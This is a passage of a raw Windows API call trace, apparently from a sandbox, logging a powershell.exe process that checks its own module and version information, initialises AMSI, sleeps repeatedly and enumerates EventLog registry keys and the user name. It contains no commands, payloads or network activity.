SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d3f254) returned 1 [0079.227] GetCurrentProcessId () returned 0xd2c [0079.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd2c) returned 0x5ec [0079.227] EnumProcessModules (in: hProcess=0x5ec, lphModule=0x487e2fc, cb=0x100, lpcbNeeded=0x6d3f48c | out: lphModule=0x487e2fc, lpcbNeeded=0x6d3f48c) returned 1 [0079.227] GetModuleInformation (in: hProcess=0x5ec, hModule=0xd70000, lpmodinfo=0x487e43c, cb=0xc | out: lpmodinfo=0x487e43c*(lpBaseOfDll=0xd70000, SizeOfImage=0x6c000, EntryPoint=0xd795f0)) returned 1 [0079.228] CoTaskMemAlloc (cb=0x804) returned 0xb8fc40 [0079.228] GetModuleBaseNameW (in: hProcess=0x5ec, hModule=0xd70000, lpBaseName=0xb8fc40, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0079.228] CoTaskMemFree (pv=0xb8fc40) [0079.228] CoTaskMemAlloc (cb=0x804) returned 0xb8fc40 [0079.228] GetModuleFileNameExW (in: hProcess=0x5ec, hModule=0xd70000, lpFilename=0xb8fc40, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0079.228] CoTaskMemFree (pv=0xb8fc40) [0079.228] CloseHandle (hObject=0x5ec) returned 1 [0079.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x104, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0079.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d3f40c) returned 1 [0079.229] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x6d3f488 | out: lpFileInformation=0x6d3f488*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0079.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d3f408) returned 1 [0079.229] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x6d3f4fc | out: lpdwHandle=0x6d3f4fc) returned 0x72c [0079.229] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x488062c | out: lpData=0x488062c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6d3f4d0, puLen=0x6d3f4cc | out: lplpBuffer=0x6d3f4d0*=0x48809bc, puLen=0x6d3f4cc) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x48806e4, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x4880738, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x4880780, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x48807e8, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x4880824, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x48808a8, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x48808f0, puLen=0x6d3f44c) returned 1 [0079.229] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x4880960, puLen=0x6d3f44c) returned 1 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x0, puLen=0x6d3f44c) returned 0 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x0, puLen=0x6d3f44c) returned 0 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x0, puLen=0x6d3f44c) returned 0 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x6d3f450, puLen=0x6d3f44c | out: lplpBuffer=0x6d3f450*=0x0, puLen=0x6d3f44c) returned 0 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6d3f444, puLen=0x6d3f440 | out: lplpBuffer=0x6d3f444*=0x48809bc, puLen=0x6d3f440) returned 1 [0079.230] VerLanguageNameW (in: wLang=0x409, szLang=0x6d3f1d4, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0079.230] VerQueryValueW (in: pBlock=0x488062c, lpSubBlock="\\", lplpBuffer=0x6d3f454, puLen=0x6d3f450 | out: lplpBuffer=0x6d3f454*=0x4880654, puLen=0x6d3f450) returned 1 [0079.391] AmsiInitialize () returned 0x0 [0084.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d3ebe0, nSize=0x80 | out: lpBuffer="හ։♦篬狍ۓۓ\x01") returned 0x0 [0084.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d3ebe0, nSize=0x80 | out: lpBuffer="က灘˳") returned 0x0 [0089.435] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.553] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.747] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.042] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.431] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.436] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.449] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.465] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.513] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.516] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.530] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.532] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.533] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.533] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.597] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.599] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.607] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0094.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d3eb30, nSize=0x80 | out: lpBuffer="က溹က溹") returned 0x0 [0096.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d3e9fc, nSize=0x80 | out: lpBuffer="ۓ籶狑虐紽က溹က溹") returned 0x0 [0097.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x698) returned 0x0 [0097.131] RegQueryInfoKeyW (in: hKey=0x698, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6d3f34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6d3f34c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f348*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x0, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x1, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x2, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x3, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x4, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x5, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x6, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegEnumKeyExW (in: hKey=0x698, dwIndex=0x7, lpName=0x49e7dbc, lpcchName=0x6d3f368, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6d3f368, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0097.132] RegOpenKeyExW (in: hKey=0x698, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.133] RegCloseKey (hKey=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x698, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.133] RegCloseKey (hKey=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x698, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.133] RegCloseKey (hKey=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x698, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.133] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.134] RegCloseKey (hKey=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x698, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.134] RegCloseKey (hKey=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x698, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.134] RegCloseKey (hKey=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x698, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.134] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x0) returned 0x2 [0097.134] RegCloseKey (hKey=0x69c) returned 0x0 [0097.135] RegOpenKeyExW (in: hKey=0x698, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x69c) returned 0x0 [0097.135] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f328 | out: phkResult=0x6d3f328*=0x6a4) returned 0x0 [0097.135] RegCloseKey (hKey=0x6a4) returned 0x0 [0097.135] RegCloseKey (hKey=0x698) returned 0x0 [0097.136] RegCloseKey (hKey=0x69c) returned 0x0 [0097.396] CoTaskMemAlloc (cb=0x804) returned 0x7092f20 [0097.396] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7092f20, nSize=0x6d3f420 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x6d3f420) returned 0x1 [0097.399] CoTaskMemFree (pv=0x7092f20) [0097.400] GetUserNameW (in: lpBuffer=0x6d3f1b4, pcbBuffer=0x6d3f42c | out: lpBuffer="FD1HVy", pcbBuffer=0x6d3f42c) returned 1 [0098.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2d0 | out: phkResult=0x6d3f2d0*=0x6a0) returned 0x0 [0098.596] RegQueryInfoKeyW (in: hKey=0x6a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6d3f320, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f31c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6d3f320*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f31c*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x0, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x1, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x2, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x3, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x4, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x5, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x6, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x7, lpName=0x4a6b0d8, lpcchName=0x6d3f33c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6d3f33c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.596] CoTaskMemFree (pv=0x0) [0098.596] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.596] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.597] RegCloseKey (hKey=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.597] RegCloseKey (hKey=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.597] RegCloseKey (hKey=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.597] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.597] RegCloseKey (hKey=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.598] RegCloseKey (hKey=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.598] RegCloseKey (hKey=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x0) returned 0x2 [0098.598] RegCloseKey (hKey=0x638) returned 0x0 [0098.598] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x638) returned 0x0 [0098.599] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2fc | out: phkResult=0x6d3f2fc*=0x620) returned 0x0 [0098.599] RegCloseKey (hKey=0x620) returned 0x0 [0098.599] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.599] RegCloseKey (hKey=0x638) returned 0x0 [0098.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2dc | out: phkResult=0x6d3f2dc*=0x638) returned 0x0 [0098.601] RegQueryInfoKeyW (in: hKey=0x638, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6d3f32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6d3f32c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f328*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.601] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x0, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.601] CoTaskMemFree (pv=0x0) 